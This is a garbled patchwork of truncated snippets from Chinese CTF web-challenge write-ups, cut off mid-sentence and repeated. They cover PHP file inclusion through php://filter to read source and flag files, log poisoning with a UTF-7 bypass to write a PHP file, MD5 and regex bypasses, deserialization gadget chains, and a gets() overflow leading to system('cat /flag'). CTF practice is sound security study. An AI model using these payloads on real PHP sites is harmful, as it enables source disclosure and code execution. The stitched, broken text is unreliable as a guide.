<?php include $_GET['file']; ?> 先用LFI读取index.php再说。 /?file=php://filter/read=convert.base64-encode/resource=index.php 得到源码: <?php error_reporting(0); $file = $_GET["file"]; if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"ph...
include_path:选择文件包含的默认路径 将log_errors=1,error_log=/tmp/f13g.php,include_path='<?php phpinfo();' index.php会根据include_path包含./f13g.php,没有该文件,报错,将错误日志与<?php phpinfo();写入/tmp/f13g.php 然后这里<>会被html实体编码转义,需要用utf-7绕过:1. php_value log_erro...
//flag in `flag.php` include($_GET['file']); }else{ echo "Baby Hacker?"; } }else{ echo "No Hacker!"; } Hint: 1219893521 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 首先爆破伪随机数:https://www.openwall.com/php_mt_seed/ root@mochu7-pc:/mnt/d...
include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if(isset($_POST['passwd'])) { $p...
intfunc(){intresult;// eaxcharv1;// [rsp+0h] [rbp-30h]floatv2;// [rsp+2Ch] [rbp-4h]v2=0.0;puts("Let's guess the number.");gets(&v1);if(v2==11.28125)result=system("cat /flag");elseresult=puts("Its value should be 11.28125");returnresult;} ...
include($file); }else{ echo'tips'; } ?> 好像没有拦截flag关键字,直接用LFI读取flag.php即可。 1 /?file=php://filter/read=convert.base64-encode/resource=flag.php 成功读取后解码 [极客大挑战 2019]Knife 打开题目,得到提示: knife 1 eval($...
<?php include "flag.php"; echo "flag在哪里呢?"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { if (!preg_match(...
#class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = '...
2021.10.3 [MRCTF2020]Ez_bypass I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { ...
include($value); } public function __invoke(){ $this->append($this->var); } } class Show{ public $source; public $str; public function __construct($file='index.php'){ $this->source = $file; echo 'Welcome to '.$this->source.""; } public function __toString(){ return $this-...